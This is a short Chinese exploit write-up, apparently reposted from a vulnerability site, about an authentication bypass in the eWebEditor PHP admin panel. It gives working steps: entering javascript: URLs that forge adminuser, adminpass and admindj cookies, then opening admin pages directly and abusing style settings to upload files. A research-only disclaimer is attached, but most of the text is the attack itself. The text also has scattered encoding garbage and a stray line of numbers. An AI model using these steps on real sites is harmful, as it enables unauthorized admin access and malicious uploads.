eWebEditor是一個(gè)所見即所得的在線編輯器。顧名思義�����,就是能在網(wǎng)絡(luò)上使用所見即所得的編輯方式進(jìn)行編輯圖文并茂的文章����、新聞��、討論貼�、通告、記事等多種文字處理應(yīng)用�����。
../ewebeditor/admin/config.php文件
用戶認(rèn)證方式存在嚴(yán)重的安全漏洞,可以直接跳過認(rèn)證獲取到管理員權(quán)限���。
[www.sebug.net]
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)! 首先當(dāng)然要找到登陸后臺,默認(rèn)是../eWebEditor/admin/login.php,進(jìn)入后臺后隨便輸入一個(gè)用戶和密碼,當(dāng)然會提示出錯(cuò)了.
這時(shí)候你清空瀏覽器的url,然后輸入
javascript:alert(document.cookie="adminuser="+escape("admin"));
javascript:alert(document.cookie="adminpass="+escape("admin"));
javascript:alert(document.cookie="admindj="+escape("1"));
后三次回車,清空瀏覽器的 url,大家注意了,這次輸入的url要注意,我們這次要輸入的文件都是在正常情況下經(jīng)過驗(yàn)證才能瀏覽的文件如../ewebeditor/admin /default.php
哈哈,直接進(jìn)去了,利用和asp一樣,新增樣式修改上傳,就ok了
400 186 1886
